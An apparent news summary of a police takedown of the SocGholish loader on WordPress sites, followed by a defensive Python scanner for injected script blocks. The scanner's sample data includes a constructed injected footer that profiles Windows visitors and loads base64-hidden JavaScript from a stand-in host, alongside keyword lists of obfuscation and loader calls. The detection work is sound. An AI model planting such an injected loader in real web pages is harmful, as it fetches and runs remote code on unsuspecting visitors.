Overview
- Authorities seized 106 servers and domains and removed SocGholish infections from 14,971 WordPress sites during a coordinated Operation Endgame action announced on Thursday, June 18.
- SocGholish is a JavaScript loader injected into compromised websites: it profiles each visitor, routes the real users it selects through traffic-distribution systems (TDS), and then shows a fake browser-update prompt whose download installs a second-stage downloader such as GhoLoader.
- Security firms and police say the loader has long served as an initial-access vector for ransomware groups and is tied to TA569/Evil Corp, a cluster researchers link to multiple ransomware and data-theft campaigns.
- Industry telemetry shows broad exposure: Infoblox reported that about 55% of its cloud customers attempted to reach SocGholish infrastructure, and ShadowServer identified more than 1.44 million compromised WordPress sites in May. Affected site owners were notified and given cleanup steps such as rotating credentials and enabling MFA.
- Officials and researchers cautioned that the disruption may be temporary: operators can rebuild infrastructure, move to other traffic-distribution services, or change delivery methods, so continued monitoring and patching of CMS sites remain essential.
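The injection-and-profiling pattern described above (a script added to a site's pages that fingerprints the visitor, then builds a script element pointing at attacker infrastructure) is what a site owner cleaning up a compromised WordPress install needs to find. The scanner below is an added example written for this page; it is not code from the original article, from Operation Endgame, or from any vendor named above, and it contains no SocGholish indicators. It applies generic heuristics only: an external script from a host outside an operator-maintained allowlist (`ALLOWED_HOSTS` is an assumption), visitor-profiling calls combined with dynamic script loading, and obfuscation helpers such as `atob`, whose argument it decodes to expose the hidden URL. The two sample page fragments are constructed for the example and are not real injected code.

```python
"""Heuristic scanner for injected loader-style <script> blocks in WordPress files.

Example code for this page, not the project's own tooling. The indicators are
generic (profiling + dynamic loader + obfuscation), not SocGholish signatures.
"""
import base64
import os
import re

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")

# Assumption: the site operator maintains the list of hosts scripts may load from.
ALLOWED_HOSTS = {"example-shop.test", "cdnjs.cloudflare.com"}

PROFILING = ("navigator.userAgent", "document.referrer", "document.cookie", "screen.width")
OBFUSCATION = ("eval(", "atob(", "String.fromCharCode", "unescape(", "document.write(")
LOADER = ("createElement('script')", 'createElement("script")', "appendChild(")


def host_of(url):
    """Return the host part of an absolute or protocol-relative URL, else None."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip())
    return m.group(1).lower() if m else None


def scan_html(name, html):
    """Return a list of findings for every <script> block that trips a heuristic."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        line = html.count("\n", 0, m.start()) + 1  # 1-based line of the <script> tag
        reasons, decoded = [], []

        src = SRC_RE.search(attrs)
        if src:
            host = host_of(src.group(1))
            if host and host not in ALLOWED_HOSTS:
                reasons.append(f"external script from non-allowlisted host {host}")

        profiling = [k for k in PROFILING if k in body]
        loader = [k for k in LOADER if k in body]
        if profiling and loader:
            reasons.append("visitor profiling combined with dynamic script loading: "
                           + ", ".join(profiling + loader))

        obfuscation = [k for k in OBFUSCATION if k in body]
        if obfuscation:
            reasons.append("obfuscation helpers: " + ", ".join(obfuscation))

        # Decode atob('...') literals so the reviewer sees the real loader URL.
        for blob in ATOB_RE.findall(body):
            try:
                decoded.append(base64.b64decode(blob).decode("utf-8", "replace"))
            except ValueError:
                continue
        for text in decoded:
            host = host_of(text)
            if host and host not in ALLOWED_HOSTS:
                reasons.append(f"decoded loader URL points to non-allowlisted host {host}")

        if reasons:
            findings.append({"file": name, "line": line, "reasons": reasons, "decoded": decoded})
    return findings


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a WordPress install (themes, plugins, uploads) and scan every matching file."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results.extend(scan_html(path, fh.read()))
    return results


# Constructed samples for the example (not real page content, not real malware).
CLEAN_FOOTER = """<footer>...</footer>
<script src="https://example-shop.test/wp-includes/js/jquery/jquery.min.js"></script>
<script>jQuery(function($){ $('.menu').on('click', function(){ $(this).toggleClass('open'); }); });</script>
</body></html>"""

INJECTED_FOOTER = """<footer>...</footer>
<script src="https://example-shop.test/wp-includes/js/jquery/jquery.min.js"></script>
<script>
(function(){var u=navigator.userAgent,r=document.referrer;if(!/Windows/.test(u)||!r)return;
var s=document.createElement('script');s.src=atob('aHR0cHM6Ly9jZG4tdXBkYXRlLmludmFsaWQvdXBkYXRlLmpz')+'?'+Date.now();
document.head.appendChild(s);})();
</script>
</body></html>"""

if __name__ == "__main__":
    for name, html in (("clean/footer.php", CLEAN_FOOTER), ("infected/footer.php", INJECTED_FOOTER)):
        for f in scan_html(name, html):
            print(f"{f['file']}:{f['line']}")
            for r in f["reasons"]:
                print("  -", r)
```

Run `scan_tree("/var/www/html/wp-content")` against a copy of the site to triage theme and plugin files; treat every hit as a lead to review by hand rather than proof of compromise, since legitimate tag managers also build script elements dynamically, and pair the file scan with the credential rotation and MFA steps above, because the injected code is only the symptom of how the site was taken over.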